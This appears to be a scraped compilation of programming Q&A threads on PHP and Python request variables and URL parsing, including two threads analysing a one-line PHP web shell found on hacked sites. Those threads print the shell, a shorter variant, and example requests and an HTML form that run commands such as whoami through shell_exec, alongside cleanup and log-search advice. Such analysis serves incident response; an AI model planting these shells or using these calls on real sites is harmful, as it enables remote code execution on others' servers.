I couldn't find out python equivalent to PHP $_SERVER.
Is there any? Or, what are the methods to bring equivalent results?
Thanks in advance.
Using mod_wsgi, which I would recommend over mod_python (long story but trust me) ... Your application is passed an environment variable such as:
def application(environ, start_response):
...
And the environment contains typical elements from $_SERVER in PHP
...
environ['REQUEST_URI'];
...
And so on.
http://www.modwsgi.org/
Good Luck
REVISION
The real correct answer is use something like Flask
You don't state it explicitly, but I assume you are using mod_python? If so, (and if you don't want to use mod_wsgi instead as suggested earlier) take a look at the documentation for the request object. It contains most of the attributes you'd find in $_SERVER.
An example, to get the full URI of the request, you'd do this:
def yourHandler(req):
querystring=req.parsed_uri[apache.URI_QUERY]
The querystring attribute will now contain the request's querystring, that is, the part after the '?'. (So, for http://www.example.com/index?this=test, querystring would be this=test)
Related
I need to extract 3 input parameters (in this example a=test, b=sell, c=12536) from the following URL
/property-test-sell-12536
and pass to the PHP file as $_GET parameters. And inside PHP file I want to access this parameter as $_GET['a'], $_GET['b'], $_GET['c'].
I researched Google about this issue. Is it possible to use only NGINX for this purpose or should I do it inside PHP file?
Input arguments are defined as ?index=value&anotherIndex=anotherValue and so forth, for example: https://example.com/search.php?query=How+to+google&lang=en
PHP will then have the variables named as the appropriate index ($_GET['index'] will return you the value).
If you'd like to have routes like example.com/shoes/5/seller then you'd need to code a custom PHP function which trims the URL and looks for strings and then stores them in an appropriate variable, probably using a regex and preg_match. Though, be careful about security as these can be rather vulnerable to things like SQL injections and server-side code execution vulnerabilities.
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=#$_GET[2]).#$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
I already posted it as a comment since the question was on hold, here now as an answer:
It's a PHP shell. If you rewrite it to <?php ($_=#$_GET[2]).#$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
As Reeno already said in a comment, it's like a PHP shell.
Explanation
Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.
$_=#$_GET[2]
Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.
#$_($_POST[1])
The # operators should suppress error logging, see PHP.net: Error Control Operators.
The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:
$_=#$_GET[2];
#$_($_POST[1]);
Use case
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.
First of all, you must remove those lines as soon as possible.
This code is used to call PHP functions. To give you an example, your hacker will use this kind of form :
<form method="post" action="http://site.com/page.php?2=shell_exec">
<input name="1" value="ipconfig -all"/>
<input type="submit" value="Send"/>
</form>
You'll then get this values :
$_ = $_GET[2] = shell_exec
$_POST[1] = ipconfig -all
$_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")
# are here to disable errors.
A simpler example would be to use this code :
<?= #$_GET['c'](#$_GET['p']); ?>
With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .
As far as I know php has an function to get the '/foo/bar/' out of a URL like: 'http://someplace.com/index.php/foo/bar/'
Can't remember what the function is called.
[edit]
I remember using something like this in ExpressionEngine (see this). And later coming over an article explaining such a function build in PHP. However I can't recall what it was.
[edit #2]
I know that there are functions to get out the URL and several to manipulate it. However I clearly remember that there were one function doing just this specific thing. Look at the ExpressionEngine example I linked to too get a better understanding of what I mean.
[edit #3]
It wasn't ExpressionEngine I had used. It was CodeIngniter. But it's basically the same thing.
[edit #4]
Maybe I am wrong. I just remembering walking over just such a function in an article once...
Case closed (unless someone stumble upon just such a function).
I believe you are looking for parse_url.
parse_url('http://someplace.com/index.php/foo');
/*
Array
(
[scheme] => http
[host] => someplace.com
[path] => /index.php/foo
)
*/
You can then manipulate the path item to remove /index.php.
It's not a function. It's a variable: $_SERVER['PATH_INFO']
That's $_SERVER['PATH_INFO']. It may not be available on all systems, it's dependent on th ewebserver passing it on. In Apache, that's the AcceptPathInfo option.
response to gregoire:
It's impossible to pull out path_info from a url with 100% reliability unless it's being done on the webserver handling that url at the time - you cannot tell where the actual script part ends and the path_info starts, especially if the path is something like
/a/b/c/scriptishere/path/info
There's no '.html', or '.php', or '.aspx' or whatever to even given you a hint. As such, this is the only way to 100% reliably answer the OP's question. Anything else is a guess - even "index.php" in the OP's sample could be a directory and the actual script is 'foo'
If the string is always going to have index.php in it, why not just substr, like so:
$url = "http://someplace.com/index.php/foo/bar/";
$delim = 'index.php';
$path = substr($url,strpos($url,$delim)+strlen($delim));
Thats a little verbose, but if you could clarify where this string is coming from what parts are going to change I could give a more concise answer.
You could also use regular expressions:
$matches = array();
preg_match('index.php\/(.*)$',$matches);
$matches will contain the matched string in index 1, index 0 will be the original string.
I didn't test that regex, but something like that should work.
How can I use download.php?get=file.exe with without the get variable, like download.php?=file.exe, using the $_GET in PHP?
You can use $_GET[0] or $_REQUEST[0]
You could use $_SERVER['request_uri'] which would allow you to omit the ? completely, leaving you with URLs like example.com/download.php/file.exe
Then, with a bit of URL rewriting (or implementing a bootstrap controller) you could clean it up even more, resulting in example.com/download/file.exe
What you need i address rewritting this wikipedia article should give you enough information to stat with. Specifically, if you use apache, read about mod_rewrite.
You can use $_SERVER['QUERY_STRING'] to get everything after the ?.
Edit: Then you could use download.php?file.exe